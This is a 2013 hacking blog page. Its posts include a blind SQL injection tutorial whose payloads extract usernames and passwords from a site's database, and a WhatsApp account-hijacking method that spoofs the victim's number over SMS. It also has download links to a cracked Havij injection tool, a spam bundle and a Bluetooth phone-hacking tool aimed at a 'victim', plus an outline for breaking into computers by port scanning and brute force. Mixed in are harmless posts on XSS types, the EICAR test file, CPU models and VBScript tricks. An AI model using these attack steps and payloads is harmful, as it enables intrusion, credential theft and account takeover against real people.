Monday, May 20, 2013

Control PC using IP address Video Tutorial



Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.

You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.

Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible.

Well, both of the hacking has the same process. Let’s summarize what we must do.

Confirm the website or a computer you want to hack.
Find or trace their IP address.
Make sure that IP address is online
Scan for open ports
Check for venerable ports
access through the port
Brute-force username and password

Click Here TO Watch The Video Tutorial



Download All in One Pak Hack Tool

[Image: urdu1.jpg]
Pak Hacking Tool 
[Image: urdu2.jpg]
MD5
[Image: urdu3.jpg]
Email Spam Software
[Image: urdu4.jpg]
SQL Tool
[Image: urdu5.jpg]
Encryption n Decrypter
[Image: urdu6.jpg]
ASCII art
[Image: urdu7.jpg]
Ping Web
[Image: urdu8.jpg]
Google Dok Scanner

Requirement to run this software Microsoft Net.frame
.
For Download this App Click Here










Sunday, May 19, 2013

Lock Files Without any Software


 Powerful way of locking and hiding important files using a the following method. Follow the instructions to make you own Locker
( Without any software !! ) :
* Open notepad.
* Copy the following code in
notepad file :

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}" goto
UNLOCK
if NOT EXIST Locker goto
MDLOCKER
:CONFIRM
echo Are you sure u want to
Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
attrib +h +s "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock
folder
set/p "pass=>"
if NOT %pass%==LOCKME goto
FAIL
attrib -h -s "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}"
ren "Control Panel.
{21EC2020-3AEA-1069-
A2DD-08002B30309D}" Locker
echo Folder Unlocked
successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created
successfully
goto End
:End

  • * Change the word "LOCKME" in above code with your password.
  • * Save it as batch file ( with extension .bat ) For eg. Locker.bat
  •  Now you will see a batch file.
  • Double click it to create a folder locker ( A new folder named Locker would be formed at the same location )
  • Thats it you have now created your own locker and that too without using any software !
  • * Brings all the files you want to
  • hide in the locker folder.
  • * Double click the batch ( As
  • created above ) file to lock the
  • folder namely Locker

If you want to unlock your files, simple double click the batch file again and you would be prompted for password ( In DOS window ). Enter the password and enjoy access to the folder.
Lock Files on Windows Without Using Any Software

Enjoy!!!!


Saturday, May 18, 2013

Hack Whatsapp mobile application Free

Follow the steps below carefully Trick 1 : Use Whatsapp With Someone Else's Number !!! This hack works by tricking the WhatsApp Verification Servers by sending a spoofed request for an authorisation code intended for an alternative phone. 1.Install WhatsApp on your device WhatsApp now starts a counter where it sends a verification message to its servers. 2.Block the messeage service it can be blocked by changing the message center number or pushing the phone into Airplane mode. 3.WhatsApp now offers an alternative method of verification Choose verify through SMS and fill in your email address. Once you click to send the SMS click cancel to terminate the call for authorisation to the WhatsApp server. 4.Now You have to do sms Spoofing You can do it using this App For Android Check your outbox and copy the message details into the spoofer application and send the spoofed verification. - Use this App and Send sms: To: +447900347295 From: +(Country code) (victims mobile number) Message: (your email address) 5. You will now receive messages intended for the spoofed number on your mobile device and you can communicate with people under the spoofed number and You have successfully hacked their whatsapp account !! Trick 2 : How to get whats app free for 10 years : ..::Requirement ­s ::.. 1. Iphone or Ipad 2.Android or Nokia Device with whatsapp ..:: Procedure ::.. 1. Remove whatsapp from your phone and take help from your friend who have owned Iphone or Ipad. 2. Ask him to register whatsapp with your number. 3. You will get an verification code on your phone,tell him verification code received on your number and enter it on his iPhone. 4.After you have done all that steps whatsapp will start on your friend’s iPhone,just check account info and it will be updated to 2022. 5.Ask your friend to delete it and install the latest version on your phone and check its expiration date.

Friday, May 17, 2013

Download Free Havij Pro Cracked Version Direct Link

Havij
Havij



Free Download Havij v1.17 Pro Cracked Version

Click Here

Havij v1.16 Pro Portable Full Version 

Click Here

Thursday, May 16, 2013

BLIND SQLI!!!!

Blind Sqli
Blind Sqli


What is Blind SQLi

Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker. The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page. This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established

Blind SQLi Tutorial

Let’s Start…………

Suppose That You want to Hack This website with Blind SQLi

http://site.com/index.php?id=5

when we execute this, we see some page and articles on that page, pictures
etc…

then when we want to test it for blind sql injection attack

http://www.site.com/index.php?id=5 and 1=1 <--- this is always true
and the page loads normally, that's ok.
now the real test

http://www.site.com/index.php?id=5 and 1=2 <--- this is false
so if some text, picture or some content is missing on returned page then
that site is vulrnable to blind sql injection.

1) Get the MySQL version
to get the version in blind attack we use substring
i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=4
this should return TRUE if the version of MySQL is 4.
replace 4 with 5, and if query return TRUE then the version is 5.
i.e
http://www.site.com/index.php?id=5 and substring(@@version,1,1)=5
2) Test if subselect works
when select don't work then we use subselect
i.e
http://www.site.com/index.php?id=5 and (select 1)=1
if page loads normally then subselects work. then we gonna see if we have access to mysql.user
i.e
http://www.site.com/index.php?id=5 and (select 1 from mysql.user limit 0,1)=1
if page loads normally we have access to mysql.user and then later we can
pull some password usign load_file() function and OUTFILE.
3). Check table and column names
This is part when guessing is the best friend 
i.e. http://www.site.com/index.php?id=5 and (select 1 from users limit 0,1)=1
(with limit 0,1 our query here returns 1 row of data, cause subselect
returns only 1 row, this is very important.)
then if the page loads normally without content missing, the table users
exits.
if you get FALSE (some article missing), just change table name until you
guess the right one
let's say that we have found that table name is users, now what we need is
column name.
the same as table name, we start guessing. Like i said before try the
common names for columns.
i.e
http://www.site.com/index.php?id=5 and (select substring(concat(1,
password),1,1) from users limit 0,1)=1
if the page loads normally we know that column name is password (if we get
false then try common names or just guess)
here we merge 1 with the column password, then substring returns the first
character (,1,1)
4). Pull data from database
we found table users i columns username password so we gonna pull
characters from that.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>80
ok this here pulls the first character from first user in table users.
substring here returns first character and 1 character in length. ascii()
converts that 1 character into ascii value
and then compare it with simbol greater then > .
so if the ascii char greater then 80, the page loads normally. (TRUE)
we keep trying until we get false.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>95
we get TRUE, keep incrementing
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>98
TRUE again, higher
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
FALSE!!!
so the first character in username is char(99). Using the ascii converter
we know that char(99) is letter 'c'.
then let's check the second character.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),2,1))>99
Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it
returns the second character, 1 character in lenght)
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>99
TRUE, the page loads normally, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>107
FALSE, lower number.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>104
TRUE, higher.
http://www.site.com/index.php?id=5 and ascii(substring((SELECT concat
(username,0x3a,password) from users limit 0,1),1,1))>105
FALSE!!!
we know that the second character is char(105) and that is 'i'. We have
'ci' so far
so keep incrementing until you get the end. (when >0 returns false we know
that we have reach the end).
There are some tools for Blind SQL Injection, i think sqlmap is the best,
but i'm doing everything manually,
cause that makes you better SQL INJECTOR
Hope you learned something from this Tutorial.
Have FUN!

Hacking Mobile Using Bluetooth 2013


Super Bluetooth Hack
Super Bluetooth Hack


Note : Only For Educational Purpose.>!!!

Super Bluetooth hack 2009 is one of the most downloaded Bluetooth
hacking tools. Super bluetooth hack 2009 is used for mobile based
Symbian operating system to hack & manage any mobile near you which is vulnerable to Bluetooth hacking attack
.
Download it from Mobicreed..

How To Install Super Bluetooth Hack 2009

1) Download to PC
2) Transfer it to your Bluetooth enabled mobile.
3) Run the Installer (Remember, You must have Java enabled phone for installing it)
4) He finds it and you will be able to run program
5) Select the language and configure it.
6) Click > Connection
7) Click > Search Devices
 Choose the “Victim”
9) And start managing with following hacks mentioned with Bluetooth.
:Enjoy:

DIFFERENCE BETWEEN CORE I3, CORE I5, CORE I7...

Main Difference : 
Intel
Intel

-> Core i3:
* Entry level processor.
* 2-4 Cores
* 4 Threads
* Hyper-Threading (efficient use
of processorresour ­
ces)
* 3-4 MB Cache
* 32 nm Silicon (less heat and
energy)
-> Core i5:
* Mid range processor.
* 2-4 Cores
* 4 Threads
* Turbo Mode (turn off core if not
used)
* Hyper-Threading (efficient use
of processorresour ­
ces)
* 3-8 MB Cache
* 32-45 nm Silicon (less heat and
energy)
-> Core i7:
* High end processor.
* 4 Cores
* 8 Threads
* Turbo Mode (turn off core if not
used)
* Hyper-Threading (efficient use
of processorresour ­
ces)
* 4-8 MB Cache
* 32-45 nm Silicon (less heat and
energy)

About XSS or Cross Site Scripting




Basic Knowledge in Hypertext markup language (HTML)

Strong Knowledge of JavaScript

Basic knowledge of HTTP client server Architecure

Basic knowledge of (PHP, ASP.NET)


What is cross site scripting XSS?

Cross site scripting XSS is one of the common website security flaws that allow a Hacker | Attacker to run his client side scripts like JavaScript’s payload into website that is viewed by others. with the cross site scripting bug may be hacker bypass access control .if hacker successfully exploit cross site scripting XSS so then hacker easily do steal account, phishing attack and many more. In simple word with the help of cross site scripting XSS hacker inject his malicious JavaScript payload into website then a user visit the website link then it will execute the malicious JavaScript payload.
Types of Cross site scripting XSS:

There are two types of Cross site scripting XSS

1. Persistent XSS ( Stored XSS)

2. Non persistent XSS ( Reflective XSS)

noman ramzan cross site scripting

Persistent Cross site scripting XSS:

The persistent XSS also known as stored XSS. As shown with the name of stored XSS and this Cross site scripting XSS stored somewhere. When attacker used Cross site scripting XSS malicious code inject into the website and then this payload saved by the server in the database and then is will run in the normal link of website.


Example of persistent XSS

There are so many website which support the forum and where the user register and ask a question like answer.yahoo.com. if the Hacker post a message with the malicious JavaScript payload then if the server fail to sanitize the payload and then code execute easily. So whenever user read to this post and open a link then inject code cookie stealing of a user and then hacker easily bypass his account.

NON persistent Cross site scripting XSS:

Non persistent also known as reflected XSS. This is very common vulnerability discover by security Researchers. And this is find in the search filed like search, contact page and subscribe email. in this attack hacker inject payload will send to the server with the request of HTTP request and then server embed with html file and then return HTTPresponse to the browser. When the browser execute the file and then it’s also execute
the scripts. so it’s a reflective XSS.


DOM based Cross site scripting XSS:


In the addition to these types DOM based XSS also third type of cross site scripting XSS. This is very important part of XSS. Most of the big website like Microsoft, PayPal, Nokia, eBay and many more website. 

Convert Text to Speech Tutorial

Convert Text to Speech
Convert Text to Speech


Convert text to speech without
any software !!!
1. Open notepad and copy this
2. Dim msg, sapi
msg=InputBox("E ­ nter your
text","Talk it")
Set sapi=CreateObje ­ ct
("sapi.spvoic e")
sapi.Speak msg
'+-> VictimBoy <-+
3. Now save this file with any
name with .vbs extension.
This creates a VBscript file. When
you open this file, it prompts for
text. Enter your text and click
OK .
WoW!! Now you can hear it ..Enjoy .. !!

Thursday, May 9, 2013

Test your Antivirus


Is your antivirus working test it by test virus

How to create the a test virus

1. Create a new text file using Notepad or any text editor.

2. Open the text file and enter the below code as the text of the file.

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

3. After the above code has been entered save the file as an .exe file instead of a .txt file. For example, name the file test.exe instead of test.txt. Alternatively you can save the file as a .txt file and then rename the file after it has been saved.

Note: In order for this to work you must have Windows showing the file extensions. By default Windows may be trying to save the file as a .txt file even if you end your file with .exe. For example, the file may be saving as test.exe.txt instead of test.exe. If after saving or renaming the file the icon still looks like a notepad, it is not being saved as an executable file.

How to always show computers file extensions.
4. After the file has been saved the anti-virus should immediately prompt for action, similar to what is shown below. If you do not receive a prompt try highlighting the file, and then right-click and choose the option to scan the file with your scanner.



If after following all of the above steps you do not receive any type of warning, your virus scanner is either not enabled or not working properly. We highly recommend either re-installing the installed antivirus scanner or trying an alternative virus scanner.

Internet !!!


The Internet is a computer network made up of thousands of networks worldwide. No one knows exactly how many computers are connected to the Internet. It is certain, however, that these number in the millions.

No one is in charge of the Internet. There are organizations which develop technical aspects of this network and set standards for creating applications on it, but no governing body is in control. The Internet backbone, through which Internet traffic flows, is owned by private companies.

All computers on the Internet communicate with one another using the Transmission Control Protocol/Internet Protocol suite, abbreviated to TCP/IP. Computers on the Internet use a client/server architecture. This means that the remote server machine provides files and services to the user's local client machine. Software can be installed on a client computer to take advantage of the latest access technology.

An Internet user has access to a wide variety of services: electronic mail, file transfer, vast information resources, interest group membership, interactive collaboration, multimedia displays, real-time broadcasting, shopping opportunities, breaking news, and much more.

The Internet consists primarily of a variety of access protocols. Many of these protocols feature programs that allow users to search for and retrieve material made available by the protocol.

Fucking Hacking Amazed


Amaze ur frnds by Getting your self automated chat !!!

copy this code in notepad and save it as assistant.vbs u can also change text according to ur choice amaze ur frnds by different tricks 


dim fname
fname=inputbox(" Hi whats your name?")
fname=inputbox(" Whats up?")
fname=inputbox(" Thats kool.")



Note: Save as .vbs not .bat and also you can change text inside the quotes

Enjoy \iMi/